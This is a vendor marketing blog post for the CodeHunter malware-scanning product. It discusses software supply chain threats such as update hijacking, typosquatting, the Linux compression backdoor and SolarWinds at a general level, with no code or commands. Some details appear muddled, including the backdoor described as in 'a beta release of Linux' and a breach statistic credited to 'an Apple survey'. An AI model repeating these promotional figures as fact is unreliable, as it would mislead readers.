Software supply chain attacks are on the rise. And why wouldn’t they be? A successful attack on any single link in a software supply chain can spell disaster downstream. We’re witnessing the birth of a whole new generation of vulnerabilities as software becomes increasingly complex and interconnected.
Cybersecurity solutions available today are built to detect known threats - this presents big problems when it comes to protecting supply chains. By the time cybersecurity teams have detected a new threat, the effects have already spread down the chain — and sometimes even beyond.
With largely reactive solutions at our disposal built to deal with the "already known", dealing with — let alone preventing — new, advanced, and complex attacks on software supply chains requires a proactive defense strategy and solutions.
Threats Don’t Sleep, and Neither Does CodeHunter
Threat actors often approach software supply chain attacks by undermining code signing — essentially faking their way into the software’s source code under the guise of a known and trusted code author. But CodeHunter operates in alignment with zero-trust policies. Where a manual check or preset configurations might call for a pass on code provided by a “trusted” source, CodeHunter’s automated system will check for code behaviors that might be suspicious or threatening every time.
Likewise, updates are part of any software’s routine development and functionality post-release. These updates create vulnerable gateways for malicious code to get in via update hijacking. A threat actor can infiltrate the update (which is increasingly common with vendors) and make an easy entrance into an unsuspecting network. To painstakingly comb through every update for malicious code would be incredibly labor intensive, time consuming, and expensive. CodeHunter works to thoroughly scrutinize the update for suspicious behaviors, providing actionable intelligence for security teams to act on in a fraction of the time it would take an advanced analyst to complete the same task.
CodeHunter Finds Threats in Open-Source Code at Scale
Another vulnerability in software supply chains is compromised open-source code. As seen in the recent Linux vulnerability, even open-source code that has been widely trusted for years can be undermined by malicious actors. In this case an individual programmer coded a backdoor into the compression function used in a beta release of Linux and an update to Linux Arch that luckily was not yet used in production systems. Although researchers found this malware before it could wreak total havoc, that is far from the norm.
The sheer scope of searching open-source code makes defending against this kind of tactic seem unrealistic. Fortunately, if malicious code did manage to get compiled into your software from such an attack, CodeHunter can be configured to automatically scan entire directories — and even networks, locally or in the cloud — to find it. By operating in the cloud and at scale, CodeHunter’s helps proactively prevent breaches involving data stored in the cloud, which represent over 80% of all breaches according to a recent Apple survey.
CodeHunter Catches Things Humans Miss
Though we do our best to protect our assets, we can’t always get everything right. Even when we err on the side of caution, it’s unrealistic to depend on individuals to catch every malicious behavior slipping through the cracks. In the past year valid accounts were the preferred initial access technique of cybercriminals, with a 71% increase in volume of attacks using valid credentials. Access to credential information is enabled by information stealers that are commonly empowered by social engineering, relying on employees to expose secure information.
This type of trickery can be replicated anywhere. A joint study between Stanford and Tessian found that approximately 88% of all data breaches are caused by an employee mistake. All a cybercriminal needs to do is insert a file name that looks similar to a legitimate one, and it can bypass even the sharpest set of eyes. This is where CodeHunter’s ability to differentiate suspicious code becomes a vital key to protecting your enterprise.
Even Unknown Threats Have No Place to Hide
We don’t always see threats for what they are, especially with all the moving parts in a software supply chain. It’s the perfect setup for a Trojan horse since it relies on passing under the radar disguised as a section of innocent-looking code.
Trojan horses often find a way in by the aforementioned typosquatting, or by any number of other ways. Trojan horses are ubiquitous and aren’t always cataloged in the malware databases traditional malware-hunting software relies upon to identify malicious code. CodeHunter scans for suspicious behavior — regardless of the correctly functioning code surrounding it — making for an effective filter that goes beyond reliance on signatures of known malware.
Mitigate the Potential Damage Done
The longer a software supply chain is compromised, the more damage is done. Proactively identifying a cyberattack before it spreads to the other links in the chain is critical and time-sensitive. The infamous SolarWinds attack comes to mind, with 18,000 customers having unknowingly downloaded an update containing a malicious backdoor. Insured losses as a result of this undetected error are estimated around $90 million, and the company itself reported a loss of $40 million in the 9 months following the attack.
IBM found the average cost to remedy a compromised software supply chain to be $4.63 million in 2023, making supply chain attacks more costly to remediate than the average malware attack. The longer malicious intrusions sit undetected on your company’s system, the greater the damage they will inflict. This is why CodeHunter is designed to find threats as soon as they step over your threshold with its automated quick scanning capabilities.
Empower Your Software Supply Chain Security
There’s no shortage of cyberthreats to software supply chains. CodeHunter’s combination of scalability and automation makes it the ideal defense against these types of cyberattacks. Defend your software supply chain more effectively in a fraction of the time and with fewer resources today.
Speak with one of our malware hunting experts today to learn more.
Advanced malware threats are invisible to existing security solutions. Find them with CodeHunter.
